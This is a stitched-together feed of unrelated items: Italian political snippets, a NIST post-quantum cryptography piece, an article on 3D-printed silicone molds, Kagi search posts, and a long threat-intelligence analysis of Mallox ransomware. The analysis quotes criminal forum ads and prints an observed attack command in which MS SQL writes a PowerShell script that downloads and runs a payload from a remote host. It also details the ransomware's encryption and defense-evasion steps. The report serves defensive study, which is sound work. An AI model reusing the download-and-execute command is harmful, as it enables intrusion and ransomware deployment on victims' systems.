@Politica interna, europea e internazionale Il ministro della Cultura Gennaro Sangiuliano ammette di aver avuto una relazione privata con Maria Rosaria Boccia. Sarebbe questo il motivo per cui la nomina della donna a consigliera del ministro per i grandi eventi non è stata formalizzata. A riportare le
@Politica interna, europea e internazionale Maria Rosaria Boccia rende pubblico di aver avuto nelle ultime ore una telefonata con il ministro della Cultura Gennaro Sangiuliano e lo accusa pubblicamente di “storpiare la realtà per coprire” qualcuno. “Te l’ho detto ieri pomeriggio
🎥 Oggi dalle ore 15 in occasione della #BiennaleCinema2024, si terrà la cerimonia di premiazione del #concorso scolastico nazionale promosso dal #MIM “Da uno sguardo – film di studentesse e studenti sulla violenza maschile contro le donne”.
🎥 Oggi dalle ore 15 in occasione della #BiennaleCinema2024, si terrà la cerimonia di premiazione del #concorso scolastico nazionale promosso dal #MIM “Da uno sguardo – film di studentesse e studenti sulla violenza maschile contro le donne”.
After EU's top court issued a ruling seemingly limiting the Commission's authority to halt "killer acquisitions," influential think tank Bruegel argued on Wednesday (4 September) that EU's competition regulator should have a stronger regulatory strategy reviewing these.
Il National Institute of Standards and Technology (NIST) del Dipartimento del Commercio degli Stati Uniti ha finalizzato il suo set principale di algoritmi di crittografia progettati per resistere agli attacchi informatici da parte di un computer quantistico.
I ricercatori di tutto il mondo stanno correndo per costruire computer quantistici che funzionerebbero in modi radicalmente diversi dai normali computer e potrebbero violare l’attuale crittografia che fornisce sicurezza e privacy per quasi tutto ciò che facciamo online.
Per difendersi da questa vulnerabilità, gli algoritmi recentemente annunciati sono specificati nei primi standard completati dal progetto di standardizzazione della crittografia post-quantistica (PQC) del NIST e sono pronti per l’uso immediato. Questi standard di crittografia post-quantistica proteggono un’ampia gamma di informazioni elettroniche, dai messaggi di posta elettronica riservati alle transazioni di e-commerce che spingono l’economia moderna. Il NIST incoraggia gli amministratori di sistemi informatici a iniziare la transizione ai nuovi standard il prima possibile.
La crittografia post-quantistica (PQC) comprende sistemi crittografici progettati per proteggere le informazioni sensibili dalle potenziali minacce poste dal calcolo quantistico. Man mano che i computer quantistici sviluppano la capacità di eseguire calcoli complessi a velocità senza precedenti, i metodi di crittografia esistenti, in particolare quelli basati su algoritmi asimmetrici come RSA ed Elliptic Curve Cryptography (ECC), affrontano vulnerabilità significative. In particolare, algoritmi come l’algoritmo di Shor possono fattorizzare in modo efficiente numeri interi grandi, rendendo i sistemi crittografici tradizionali suscettibili alle violazioni, accendendo così un’urgenza globale per soluzioni robuste e resistenti ai quanti.
La transizione alla crittografia post-quantistica è fondamentale per la salvaguardia delle comunicazioni digitali in vari settori, in particolare nella finanza e nella sicurezza nazionale, dove l’integrità e la riservatezza dei dati sono fondamentali. Il National Institute of Standards and Technology (NIST) sta guidando la definizione di nuovi standard per PQC. Questa iniziativa sottolinea la necessità per i settori pubblico e privato di adottare proattivamente misure di crittografia resistenti ai quanti per affrontare in modo preventivo le imminenti minacce quantistiche che potrebbero compromettere i quadri di sicurezza consolidati .
Con l’evoluzione della tecnologia di calcolo quantistico, devono evolversi anche le strategie per la sicurezza dei dati.
La collaborazione tra enti governativi, esperti del settore e istituzioni accademiche è essenziale per facilitare la rapida integrazione delle soluzioni PQC e per promuovere lo sviluppo di standard crittografici resilienti in grado di resistere al panorama delle minacce quantistiche
"Marty, presto, dobbiamo tornare indietro nell'anno in cui é stato inventato Facebook e impedire così a orde di boomer di iscriversi e smarronare su quanto stavano bene negli anni 70 , presto! " #ritornoalfuturo
@Notizie dall'Italia e dal mondo Terza parte dell'articolo sull'artista, attivista per i diritti umani, femminista e accademica che vive a Londra. Rafeef Ziadah ha scritto poesie che si potrebbero definire profetiche. L'articolo CULTURA. La diaspora
While it’s the ideal choice for mass production, injection molding is simply no good for prototyping. The molds are expensive and time-consuming make, so unless you’ve got the funding to burn tens of thousands of dollars on producing new ones each time you make a tweak to your design, they’re the kind of thing you don’t want to have made until you’re absolutely sure everything is dialed in and ready. So how do you get to that point without breaking the bank?
That’s not always an easy question, but if you’re working with silicone parts, the team at OpenAeros thinks they might have a solution for you. As demonstrated through their OpenRespirator project, the team has developed a method of 3D printing single-use molds suitable for large silicone parts that they’re calling Digital-to-Silicone (D2S).
In the video below, [Aaron] and [Jon] explain that they started off by simply printing injection molds in the traditional style. This worked, but the molds can get quite complex, and the time and effort necessary to design and print them wasn’t a great fit for their iterative development cycle. They wanted to be able to do from design to prototype in a day, not a week.
Eventually they realized that if they printed the mold out of a water-soluble filament, they could simplify its design greatly. They’ve documented the design process in detail, but the short version is that you essentially subtract the 3D model of the design you want to produce from a solid shape in your CAD package, and add a few holes for injecting the silicone. Once the silicone has cured, the mold can be dissolved away in warm water to reveal the finished part.
They then took this concept a step further. Thanks to the multi-material capabilities offered by some of the latest 3D printers, it’s possible to print structures within the mold. Once the silicone is injected, these structures can become part of the finished part. For the OpenRespirator, this lets them add PETG stiffening rings around where the filters to snap into the silicone mask body.
As an added bonus, the video also goes over their method of prototyping pleated filters with 3D printed forms. After inserting the filter media, snap-in arms push it down into the valleys of the form to create the pleats. These are held in place with the addition of small metal rods that are attracted to the magnets embedded into the form. Once the top and bottom of the form have been closed over the filter, silicone is injected to create a ring around the filter and lock everything into place.
We often think of 3D printing as ideal for prototyping, but usually in a very direct and obvious way. You print out a part to see if it works the way you want, and then take the design and have it made out of something stronger. But this presentation from OpenAeros shows just how versatile the technology can be. With even a half-way decent desktop printer, the potential time and cost savings can be enormous. Something to keep in mind should one of your side projects turn into something bigger.
Mallox is a sophisticated and dangerous family of malicious software that has been causing significant damage to organizations worldwide. In 2023, this ransomware strain demonstrated an uptick in attacks, the overall number of discovered Mallox samples exceeding 700. In the first half of 2024, the malware was still being actively developed, with new versions being released several times a month, while the Mallox RaaS affiliate program advertised on dark web forums was seeking new partners. This article aims to provide a comprehensive technical overview of the ransomware and its history.
Background
Mallox started operating in the first half of 2021, with the first known encryptor sample discovered in May 2021. From the very beginning, this malware was used in human-operated attacks against companies and organizations. The Trojan samples were tailored to each specific victim, with the name of the target company hardcoded in the ransom notes and the extension of the encrypted files. This is why this malware strain is known under many different aliases: the Trojan was not originally named “Mallox”, and each researcher introduced their own moniker for this malware.
In order to illustrate the different names used by Mallox variants throughout the family’s existence, we parsed more than 700 samples and built a table showing the numerous extensions we found in those.
2021
# of samples
2022
# of samples
2023
# of samples
2024 H1
# of samples
.architek
1
.avast
1
.bitenc
1
.hmallox
2
.artiis
1
.bozon
3
.host
1
.ma1x0
5
.brg
1
.bozon3
1
.mallab
223
.mallox
21
.herrco
1
.carone
1
.mallox
210
.rmallox
57
.mallox
6
.consultransom
2
.malloxx
30
.tif
1
.servimo
1
.deviceZz
1
.malox
63
.tohnichi
3
.exploit
1
.maloxx
8
.explus
1
.xollam
7
.FARGO
1
.FARGO2
1
.FARGO3
20
.mallox
100
.prismchigo
1
.rexiaa
1
In early 2023, SuspectFile published an interview with individuals who claimed to be the threat actors behind Mallox. In the interview, the actor stated that they purchased the source code for the encryption Trojan in 2022. That might mean that it was previously operated by another group, which would explain the change in the naming pattern: from a unique name for each victim to the “Mallox” universal branding.
Most articles and blog posts refer to this strain as Mallox, Tohnichi, Fargo or TargetCompany.
Timeline
Judging by the PE timestamps in the discovered samples, which proved to be unaltered and represent the actual release date of the given sample, there were several spikes in new samples: late 2022, early 2023 and late 2023.
Discovered Mallox samples by PE timestamp (download)
The number of ITW Mallox samples strongly correlates with Kaspersky Security Network (KSN) telemetry. KSN is our cyberthreat-related data processing system, which works with data consensually provided by Kaspersky users. The graph below shows spikes in unique users who encountered the Mallox ransomware in March 2023 and October 2023, which match the previous graph and indicate increased activity by the group during these periods.
A January 2023 post on the dark web forum RAMP by a user named Mallox promoted a ransomware-as-a-service affiliate program with the same name.
The original ad for Mallox RaaS
The translation of the post is given below.
Mallox is looking for pentesters with their own material to join the team or as partners If you have your own material, we are ready to offer high-quality software and support
Features: – Blog – Web panel with pricing settings per client, chat, Statistics and bonuses – Encryption: elliptic-curve cryptography + ChaCha20 + many software updates made – Clean code
Terms: – 70% for you, 30% for us – 80% for you, 20% for us if you have a lot of material and large networks – Experience is key! Don’t write if you’re out to practice, don’t waste our time, there will be a selection process, we don’t accept all comers, only a limited number of partners on a long-term basis! – We will disable inactive ones over time – We don’t do business with English speakers
IM in Jabber for details: [redacted]
The ad states that the RaaS owners are looking for “pentesters”, i.e. affiliates willing to search for and infiltrate companies. Priority is given to those affiliates that have already obtained unauthorized access to a lot of organizations and/or large networks. Such partners are offered 80% of the profits, while those without a substantial number of readily available victim networks are invited to work for 70% of the ransom.
The poster emphasizes that they are looking only for long-term relationships with experienced affiliates. They are not interested in wasting their time on novice cybercriminals and do not provide any training. The RaaS representative also stresses that they do not work with English-speaking affiliates.
Another RAMP post by the same user in September 2023 said the group was willing to purchase access credentials to victim networks, most likely to launch ransomware attacks on their own.
Market – Access (SSH/RDP/VNC/Shell) / Ищем поставщика доступов.Сотрудничество\Реализация. Заберем доступы под реализацию. Условия сортудничества – оговариваются лично. – Интересуют доступы: фортики, циско впн и другие. – Revenue от 10kk+ – Юзер в домене. – AD. – Гео US/CA/AU/UK/DE. – Не интересуют: EDU/GOV – Тематика рассматривается индивидуально, госпитали и учебные заведения не иинтересуют. – Работаем честно и четко, поставщик будет иметь доступ к панели и чатам и видеть все на свои глаза. – Если будет постоянный поток ТОП мата , готовы предоставить вам лучшие условия и забрать к себе в приват.
Контакты джаббер: [redacted]
Market – Access (SSH/RDP/VNC/Shell) / Looking for an access provider. Partnership/Purchases. Will buy access credentials for use. Terms to be negotiated in private. – Interested in access to Fortinet VPN, Cisco VPN, etc. – Revenue from 10kk+ – Domain user – AD – Geo: US/CA/AU/UK/DE – Not interested in: EDU/GOV – Industries considered on case-by-case basis. Not interested in hospitals or schools. – We do business honestly and transparently: the seller will have access to the panel and chat to see it all with their own eyes. – If there is a constant flow of TOP material, we are ready to give you the best terms and offer you a private deal.
Jabber contact: [redacted]
This post sheds further light on the Mallox RaaS creators’ business model. They look for wealthy victim companies with revenue of $10 million or more in any of the five listed countries. They also aim to avoid attacking educational, governmental and healthcare organizations.
Statistics on the RaaS affiliates
By analyzing Mallox samples, we were able to determine that starting in 2022, the developers added C&C reporting to their malware. This sends information about each infected computer, but more interestingly, it also appends an affiliate ID string to the Trojan’s HTTP request. We extracted these affiliate IDs from the samples we had obtained and built a data model, which allowed us to investigate the distribution of samples across partners throughout the evolution of the RaaS program.
Affiliate ID string
# of samples
admin
72
amigosbos9k
55
bitenc
1
bloodbeard
2
caneddy
1
grinder
10
hiervos
251
last
1
lastsmile
2
leandra56
1
loader
7
maestro
170
mallox
2
Neuroframe
11
panda
42
samuel
13
truetl
4
UserHelp
4
vampir
65
We also analyzed the changes in the distribution of samples across the most active affiliates by year. These changes indicate that after the launch of the RaaS program, it rapidly expanded to reach 16 active affiliates operating 500 samples, and then shrank in the first half of 2024. At the time of writing this post, we observed a total of 19 Mallox RaaS partners.
Also notable is the fact that the original five affiliates that were working with Mallox in 2022 continue to do so in 2024. This might indicate that the core subscribers seem to be satisfied with the program’s terms and prefer it to other options available on the darknet market.
Please note that at the time of writing this report, the data for 2024 was limited to H1.
Mallox samples by affiliate ID
Typical infection scenario
Mallox affiliates are free to choose their methods of compromising victims’ networks. Some of the campaigns we observed involved sending spam with malicious attachments. In another recent campaign in China, the threat actors allegedly exploited a vulnerability in the IP-Guard software for initial access.
While analyzing KSN telemetry, we determined that one of the most common infection vectors used by the attackers was penetrating internet-facing MS SQL or PostgreSQL servers. To achieve this, the threat actors typically either exploit RCE vulnerabilities, such as CVE-2019-1068 or CVE-2020-0618 in unpatched MS SQL server installations, or carry out brute-force or dictionary attacks.
Typical Mallox attack pattern
The compromised MS SQL server process executes a command that creates a PowerShell script and launches it using the sqlps command, then starts the first stage portable executable (PE) payload downloaded by the PowerShell script. cmd.exe /C "echo $cl = New-Object System.Net.WebClient >%APPDATA%\alta.ps1 & echo $cl.DownloadFile("hxxp[:]//<ip address>/scavenger.exe", "%APPDATA%\box.bat") >> %APPDATA%\alta.ps1 & sqlps -ExecutionPolicy Bypass %APPDATA%\alta.ps1 & WMIC process call create "%APPDATA%\box.bat"" This first-stage PE payload in Mallox attacks is typically either a sample of the Remcos RAT subsequently used by the operators for remote access to the compromised network, or a .NET downloader that automatically fetches the second-stage PE payload, which is the encryption Trojan. The .NET downloaders used in this scheme are mostly simplistic and implement a procedure to download a binary from the hardcoded URL, decrypt it with a XOR loop and execute it in memory.
Analysis
Several hundred different samples have been found since the first version of Mallox was discovered. Mallox developers have continued to improve the ransomware and add new features. For convenience, we divided these samples into several different versions. Below, we will perform a detailed analysis of the first and the latest known versions. Moreover, we will provide a comparison table with other known versions to show how the Trojan has evolved, what features have been added and how the cryptographic scheme has changed.
Earliest known Mallox version (9b772efb921de8f172f21125dd0e0ff7, v1)
This sample was discovered in mid-May 2021 and is the first discovered executable file belonging to the Mallox ransomware family. It is considered to be the original Mallox version. We have found several samples of this version with various extensions and notes that contain explicit names of the victim organizations. This is one of the few variants of Mallox that support debug logging, which outputs errors and other information about the encryption process to the console. In later versions, the logging functionality was removed or excluded from the release build.
The ransom note left behind by the original Mallox version looks typical of ransomware: it contains a unique victim identifier, conditions for file decryption, a threat to publish stolen data and the address of the negotiators’ website on the Tor network. To demonstrate their ability to decrypt files, the attackers offer to decrypt several test files that do not contain important data. In this version, the victim organization’s name is explicitly indicated inside the note.
Mallox ransom note from the original version
Preparing for encryption
Before encrypting files on the device, the ransomware performs several preparatory steps. First, it checks the language settings of the victim’s operating system. The ransomware immediately terminates if a Russian, Kazakh, Tatar, Belarusian or Ukrainian language identifier is set. Developers of malware typically do this if they hope to avoid prosecution in the countries where the languages are spoken. However, in the interview published in January 2023, a Mallox representative said of these restrictions, “This is due to the developer’s own decision to restrict our operations in those regions. We have no prejudices or preferences in which countries to work”. In the same interview, they claim that the project’s code previously had been used by other ransomware groups and subsequently purchased by the current threat actors. This means that early samples may not be linked to the current owners of Mallox, or that several independent groups may be using these.
Mallox main function
If the default language of the operating system is not on the exclusion list, the ransomware process obtains the SeTakeOwnershipPrivilege and SeDebugPrivilege privileges. Next, it removes the keys and values from the registry using the WinAPI function SHDeleteKeyW, apparently to counter system defenses.
After that, Mallox deletes the shadow copies using the vssadmin.exe utility and completely disables Windows Recovery Environment.
Drives enumeration and exclusions
Mallox encrypts data on all drives from A through Z if these have the following types: DRIVE_REMOTE, DRIVE_REMOVABLE or DRIVE_FIXED. It also supports text files containing paths for encryption via the command-line arguments, such as “-p” and “-d”. If the argument “-d <text_file_path>” is set, the ransomware encrypts only the paths in the text file and does not encrypt the device’s drives recursively. If the argument “-p <text_file_path>” is set, it first encrypts the paths in the text file and only then, the data on local drives. The full list of file path arguments accepted by the original version of Mallox is provided below.
Argument
Description
-d <path>
Expects a path to the text file, encrypts only the paths in the file.
-p <path>
Expects a path to the text file, first encrypts the paths in the file and only then the drives.
-l <path>
Expects a path to the text file. It was not noticed that it affected anything.
To calculate the count of threads that will be used to encrypt files, Mallox uses the WinAPI function GetSystemInfo. It gets the dwNumberOfProcessors value from this function and doubles it. However, the count of threads is limited to 64 and cannot exceed this value.
Mallox supports allowlist functionality. Lists of extensions, folder names and file names which must not be encrypted are embedded into the ransomware. The folder names include the names of the operating system folders and certain widely known applications. One of the interesting names among the exception files is “debugLog.txt”, which is presumably used for debugging purposes.
Below is pseudocode for iterating through drives, which is done if the “-d” argument is not set. The code shows that Mallox can use two different directory and file iterating methods: manual NTFS parsing and File Management Functions (WinAPI).
Drive search code for encryption
Cryptography
Mallox implements a convoluted encryption scheme consisting of several cryptographic algorithms.
Every time Mallox starts, it generates a new user private ECC (elliptic curve) key to be used with ECDH (Elliptic-curve Diffie–Hellman key agreement protocol on the Curve25519). To generate this private key, the ransomware uses the pseudorandom number generator Mersenne Twister, the seed for which is generated using the WinAPI function CryptGenRandom. If there are problems with initializing the Cryptographic Service Provider (CryptGenRandom cannot be used), then the seed is generated via a set of functions: QueryPerformanceCounter, GetTickCount, GetCurrentThreadId, GetCurrentProcessId, and the __rdtsc instruction. The outputs of these functions are multiplied and used as a Mersenne Twister seed.
Mersenne Twister seed generation
The generated ECC private key is 32 bytes in size. From this private key, the Trojan generates a corresponding user ECC public key. The Trojan then calculates a shared secret using the Elliptic-curve Diffie–Hellman key agreement protocol (ECDH) from the user ECC private key and the attacker’s master ECC public key that is hardcoded in the Trojan’s body. The user ECC private key is not stored anywhere, and the user ECC public key is added to each encrypted file and is necessary for attackers to recalculate the shared secret.
In the picture below, the first call to the curve25519 function generates a user public key, and the next call generates a shared key, which is then hashed with SHA-256.
Code for generating a shared secret
The first six bytes of the user ECC public key in hexadecimal form are used as the unique identifier of the victim, referred to as “personal identifier” in the note. It is generated uniquely each time the ransomware starts and does not depend on the device, so the identifier will change with each new run.
Files that are not on the allowlists are encrypted with the ChaCha20 stream cipher. The file key and nonce for ChaCha are encrypted using the symmetric encryption algorithm AES-128 in CTR mode. The key for AES is the first half of the SHA-256 hash of the shared secret obtained previously by using the ECDH protocol.
Files smaller than or equal to 10240 bytes are encrypted in their entirety. Larger files are encrypted using a stripe method: the file is broken down into 100 pieces, each further divided into 100 chunks. Each of the resulting chunks is encrypted with ChaCha. If the chunk size is less than 4096 bytes, the malware expands its size to 4096 bytes prior to encryption.
At the end of each encrypted file, Mallox appends a structure we will designate as a “technical buffer”, which stores the information necessary to decrypt the file. The Mallox sample in question has a minimalistic buffer that contains only an encrypted key and nonce for ChaCha, IV for AES, and the user’s ECC public key. The latter is intended to be used by attackers to recover the shared secret and calculate its SHA-256 hash, the first half of which is the encryption key for AES-128 CTR, and, along with IV, is necessary to decrypt the ChaCha key and nonce.
In the picture below, the ChaCha key and nonce are shown in red, AES CTR in blue, and the public user ECC key in orange.
“Technical buffer” structure saved at the end of the file
After the encryption is complete, the executable file is deleted via the “del” command.
Communication with the attackers’ C&C server
Before starting the file encryption process starts, Mallox sends the following information about the infected device to the attacker’s server using an HTTP POST request: the victim’s unique identifier obtained from the public key, the local computer name and the DNS name of the primary domain determined via a call to LsaQueryInformationPolicy with the PolicyDnsDomainInformation parameter.
Code to send an HTTP request
After the encryption is completed, the ransomware sends a request to the attacker’s server again, with the victim’s ID and information about the encrypted disks.
Recent Mallox version (e98b3a8d2179e0bd0bebba42735d11b7, v12)
This is one of the most recent versions of the Mallox ransomware, found in March 2024. Below, we provide an analysis of this version, but the main purpose of the analysis is to show the difference between the first and the recent versions.
Compared to the original version of Mallox, one of the significant changes that occurred in later versions concerned the format of the note. The original version explicitly showed the name of the attacked company and device, but later versions more often had a generic note and extensions.
Generic ransom note
New arguments
Argument
Description
-path <path>
Does not work in this version. Expects a path to encrypt.
-queue <integer>
Does not work in this version. Expects an integer value.
Two new arguments have been added compared to the first version, but none of the new or old arguments work in this variant. Any arguments passed via the command line are in fact checked for existence through the PathFileExistsW function, so the ransomware apparently only accepts file paths as arguments: “mallox.exe <path1> <path2>…. <pathN>”.
Any arguments that are not paths, including “-p”, “-d”, “-l”, “-path”, “-queue”, result in an error. If the correct paths are passed, the ransomware checks whether it is running with administrative privileges and, if so, it encrypts the files at these paths. If running without administrator permissions, it attempts to elevate its privileges by restarting using ShellExecuteW with the verb runas, used to run the application as the administrator.
Preparing for encryption
Mallox sets the computer’s power scheme to High Performance, obviously in order to increase the performance and speed of the encryption process.
Pseudocode to change the power scheme
In this version, the Trojan contains a new function for terminating active processes via the TerminateProcess WinAPI function so as to keep them from blocking user files or interfering with the encryption process. The list of terminable process names refers mainly to databases, such as SQL Server, Oracle Database, Pervasive PSQL and MySQL.
Another new feature concerns services: the Trojan uses the Service Control Manager to disable and stop services using the ChangeServiceConfig and ControlService functions.
If the user tries to shut down or restart the operating system, Mallox attempts to prevent this. Using the ShutdownBlockReasonCreate function, the ransomware makes the OS display a threatening message about the possibility of file damage unless the user aborts the shutdown or reboot.
Threat message about file damage
Before starting encryption, the Trojan modifies the registry keys of the HKEY_LOCAL_MACHINE hive to disable UAC and hide the Shut Down, Restart and Sign Out buttons.
Cryptography
The key generation scheme in the recent version shows significant changes. Presumably, the algorithm was altered by the Mallox developers in an attempt to fix vulnerabilities that allowed decrypting victims’ files without the attackers’ private key in earlier versions of the malware.
In this latest version, three values embedded in the code are used to generate a shared secret: two public ECC master keys (master_public_key_1, master_public_key_2) generated on the attacker’s side and a hardcoded 12-byte array. The resulting new scheme is presented below:
When the Trojan starts, it generates 56 random bytes via CTR_DRBG.
Twelve bytes in the middle of this 56-byte array are replaced with the hardcoded bytes.
The resulting 56 bytes are hashed with SHA-256.
Using ECDH (curve25519) with the result of hashing and master_public_key_1, the Trojan generates a user_private_key.
Using ECDH (curve25519) with the user_secret_key and the elliptic curve base point, the Trojan generates a user_public_key.
Finally, again, using ECDH (curve25519) with user_secret_key and master_public_key_2, the Trojan generates a share_key shared secret.
Later, this share_key is hashed with SHA-256.
Below is a simplified diagram of this.
Key generation scheme in the most recent Mallox version
The file encryption algorithm has also changed: now files are encrypted using AES-256 in GCM mode. File keys are generated with ISAAC PRNG, seeded by the output of the BCryptGenRandom API function combined with Mersenne Twister PRNG. The file keys, as before, are encrypted using AES-128 in CTR mode, and the key for that is still the first half of the SHA-256 hashed share_key.
The technical buffer added at the end of each encrypted file has been expanded. Its beginning and end are indicated by the markers 0x02010201 and 0x04030403, shown in green in the image below. In this version, the ransomware encrypts the first 60% of the file — the total number of encrypted file chunks is shown in pink. Compared to the original version, the chunks have a size of 0x800000 bytes, are located next to each other and are encrypted entirely without further division. Purple stands for the size of the original file, red for the encrypted file key and IV for AES-256-GCM. The blue part is IV for AES-128-CTR, which is used to encrypt file keys. The orange part is the user_public_key.
“Technical buffer” structure saved at the end of the file in the latest Mallox version
Communication with the attackers’ C&C server
First, the ransomware gets the external IP address of the encrypted device via a third-party public service. Then it collects information about the user, device, network, disks and files and sends it to the attacker’s C&C server with an HTTP POST request.
Data sent to the attacker’s C&C
If all data is received and processed successfully, the server responds with “Successfully_added”.
Server response
Timeline of Mallox versions
We have been tracking a large number of samples since the very first version of Mallox appeared in 2021. During this time, more than 700 different samples have been found, which we have divided into 12 versions for convenience. This division is based on changes in ransomware functionality or cryptography. Please note that the Trojan samples do not contain any version numbers internally. In the tables below, we provide a brief description of changes introduced in each Mallox version along with the MD5 of one of the samples belonging to this version.
Sample hash (MD5)
Version
PE timestamp
Comment
9b772efb921de8f172f21125dd0e0ff7
1
15 May 2021
Earliest found version
79b60f8b5052a9d4cc0c92c2cdc47485
2
20 Nov 2021
The notes became generic, presumably as an initial step in a transition to RaaS distribution.
e713f05a62914496eef512a93a611622
3
17 Feb 2022
Fixed a vulnerability in the encryption scheme that allowed files to be decrypted without the attackers’ private keys.
3829a09bca120206883539eb33d55311
4
9 May 2022
Disabled self-spreading. The vulnerability is still fixed.
a8e214683307adaff39783dc656b398a
5 (gen)
10 Jun 2022
Removed the vulnerability fix introduced in version 3. Added a new public key generation scheme using data from the device — we refer to this scheme as “generated key”. Added a new “-path” argument. Enabled self-spreading again.
ac1a255e5c908f12ef68a45fc0043b16
6 (emb)
17 Jul 2022
Removed the vulnerability fix introduced in version 3. Added a new public key generation scheme, using an embedded key — we refer to this scheme as “embedded key”.
Starting with versions 5 and 6, all the subsequent versions through 11 were divided into two key generation schemes: “generated key” (gen) and “embedded key” (emb). These versions were used in parallel, and if some changes were made to one of these variants, then the other variant with the same changes would soon appear, sometimes on the same day. Later in this report, we will describe both methods in detail.
Hash (MD5)
Version
PE timestamp
Comment
b1b42fa300d8f43c6deb98754caf0934
7 (gen)
25 Oct 2022
Added registry modification functions and an OS shutdown message. Completed the transition to a RaaS distribution scheme with support for affiliate IDs hardcoded in the Trojan’s body and reported to C&C via the HTTP parameter “user=”.
3762f98a55f0ec19702f388fc0db74e2
8 (emb)
31 Oct 2022
Similar to the previous one, but with a different key generation scheme.
6bd93817967cdb61e0d7951382390fa0
9 (gen)
18 Apr 2023
Added a new argument: “-queue”.
c494342b6c84f649dece4df2d3ff1031
10 (emb)
18 Apr 2023
Similar to the previous one, but with a different key generation scheme.
16e708876c32ff56593ba00931e0fb67
11 (emb)
25 Sep 2023
Switched to an x64 version: later versions are also x64, while all earlier versions were x86. Added new features: power scheme, disabling UAC, hiding Shutdown/Reboot/Sign out buttons, etc. Switched to a new format for arguments: requires valid file paths as arguments. Also, instead of ChaCha, file content is now encrypted with AES-256-GCM.
d32a3478aad766be96f0cdbda1f10091
11 (gen)
26 Sep 2023
Similar to the previous one, but with a different key generation scheme.
e98b3a8d2179e0bd0bebba42735d11b7
12
6 Mar 2024
Fixed a vulnerability in the key generation schemes by adopting a new, cryptographically secure scheme. Added the cryptographic random number generator CTR_DRBG (AES based).
There is one version that stands out from this classification. We dubbed it 1F. The only two samples belonging to this version were discovered in June 2023 and February 2024. Despite the discovery dates, they are almost exactly the same as the first version, but with a fixed vulnerability in the cryptographic scheme. What is curious, this fix differs from the convoluted encryption schemes seen in versions 3, 4 and 12. Instead, it is a small local fix using the cryptographically secure SystemFunction036 (RtlGenRandom) function for seed generation.
Hash (MD5)
Version
PE timestamp
Comment
98c7f6b6ddf6a01adb25457e9a3c52b8
1F
5 Jun 2023
Fixed a vulnerability in the version 1 key generation scheme using RtlGenRandom.
b13a1e9c7ef5a51f64a58bae9b508e62
1F
23 Feb 2024
Exactly the same as the previous one.
Cryptographic scheme in v5 and above: the “generated key” variant
This scheme uses data from the device to populate an array with a maximum size of 56 bytes, from which a user ECC private key is obtained. The array is generated based on the functions GetVolumeInformationW, GetFileTime, GetComputerNameA, and the CPUID instruction.
Bytes count
Entropy source
Comment
4
GetVolumeInformationW
16
__cpuid
12
Embedded in code
Varies between samples
8
GetFileTime
<= 16
GetComputerNameA
Can be less than 16 bytes
The rest of the scheme contains three curve25519 calls, similar to the recent version (12), but unlike that, the scheme described in this paragraph is not cryptographically secure.
Shared key generation, “generated key”, v5+
Cryptographic scheme in v6 and above: the “embedded key” variant
In this case, no random value generation is used to calculate the shared secret share_key. The user_private_key is hardcoded in the Trojan’s body, and the rest of the scheme has not changed compared to the first version. This is also a cryptographically non-secure scheme.
Shared key generation, “embedded key”, v5+
Negotiation portal and DLS (data leak site)
When encrypting a victim’s files Mallox creates a ransom note commonly named “HOW TO BACK FILES.txt”, “HOW TO RESTORE FILES.txt”, “RECOVERY INFORMATION.txt”, “FILE RECOVERY.txt” or some such. In the note, the threat actors instruct the victim about the ways to communicate with the attackers to negotiate the ransom payment: by visiting a specified TOR site (negotiation portal) and logging in with the victim ID, or by sending an email message to a specified address.
Upon authenticating with the negotiation portal, the victim is presented with a page containing information about their infection case:
Status: whether the exfiltrated data has been published
Ransom price in USD and BTC
Payment addresses for BTC and TETHER TRC-20
Answers to frequently asked questions
Chat widget to talk to the ransomware operator
Negotiation portal (victim page)
The main page of the Mallox data leak site, which resides on the same domain as the negotiation portal, contains the list of victim companies. Countdown timers indicate the remaining time until the stolen data from each company is published in case the victim fails to pay up.
Mallox data leak site: the home page
The information about the companies that apparently refused to cooperate is provided on a new page when the user clicks “View”. This page lists some details, such as the victim’s approximate revenue, the total volume of stolen data, links to download archives allegedly containing some or all of the exfiltrated files, and the password to unpack the archives.
Page with victim company details
For additional publicity and promotion of their affiliate program, the Mallox threat actors maintain an X account that posts regular updates about the group’s new victims and shares links to download new portions of stolen data.
Mallox profile on X
Victims
The geographical distribution of unique KSN users who encountered the Mallox ransomware shows that the affiliates of the RaaS do not restrict their activities to a specific country and apparently aim to attack vulnerable companies anywhere these are located. That being said, some regions tend to be a more desirable target for Mallox extortionists. The countries that have attracted the most infection attempts are Brazil, Vietnam and China.
Geographical chart of Mallox attack attempts (download)
Conclusions
Our report provides a comprehensive overview of the Mallox ransomware, its characteristics, the history of its evolution, and the potential impact it can have on victims. By understanding the nature of Mallox ransomware and implementing appropriate security measures, companies and organizations can better safeguard their digital assets and minimize the risk of falling victim to this malicious software.
Our recommendations for maximizing your organization’s security:
Do not expose remote desktop services, such as RDP, to public networks unless absolutely necessary, and always use strong passwords.
Make sure commercial VPN solutions and other server-side software are always up to date as exploitation of this type of software is a common ransomware infection vector. Always keep client-side applications up to date.
Focus your defense strategy on detecting lateral movements and data exfiltration to the internet. Pay special attention to outgoing traffic to detect cybercriminal connections. Back up data regularly. Make sure you can quickly access it in an emergency. Use the latest Threat Intelligence information to stay up to date on the latest TTPs used by threat actors.
Use Managed Detection and Response services to help identify and stop an attack in the early stages, before the attackers achieve their ultimate goals.
@Kagi HQ is the very interesting project for a paid search engine, without tracers and with an accuracy in identifying results such as to exclude all Google spam.
Those who believe that #Kagi's costs are too high, should reflect on a small detail: if Google lets all those searches be done "for free", who pays those costs? The answer might seem simple: "advertisers".
Yet this would be an incomplete answer: like saying that rain is caused by clouds!
In reality, those costs are paid by users, by being milked and letting Google extract their "value", a bit like in the human farm in Matrix...
Hello, Fediverse! We're Kagi, and we're on a mission to create a friendlier, more human-centric internet that has the users' best interest in mind.
Our core product is a search engine that is ad-free, tracking-free, and fully supported by our users. We've worked hard to deliver a high-quality, fast, and reliable search experience without compromising user privacy: kagi.com/
I've tested kagi and agree that the search results are great. What I don't like is that it's making anonymous searching impossible, since I have to be logged in to use it (or use my unique token as part of the url for mobile searches).
Ultimately this means to me that in a private window mode (or even logged out with a fingerprinting resistant browser) I do not have the same degree of anonymity I enjoy even when using Google, let alone DDG or others.
I like the idea of not being dependent on google, but exposing my entire search history to one single entity is not my answer of choice.
I subscribed to the lower tier for a while, but I kept running out of searches early on every month, and the price of the higher tier is just not excusable. So I found myself adding the !ddg bang most of the time to avoid spending my Kagi quota.
